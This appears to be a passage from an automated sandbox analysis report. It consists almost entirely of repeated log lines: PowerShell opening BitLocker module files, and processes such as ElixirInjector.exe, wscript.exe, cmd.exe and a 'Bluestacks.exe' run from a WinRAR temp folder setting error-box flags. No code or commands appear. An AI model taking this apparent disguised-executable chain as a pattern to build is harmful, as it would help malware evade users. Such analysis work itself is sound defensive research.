Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\ElixirInjector.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
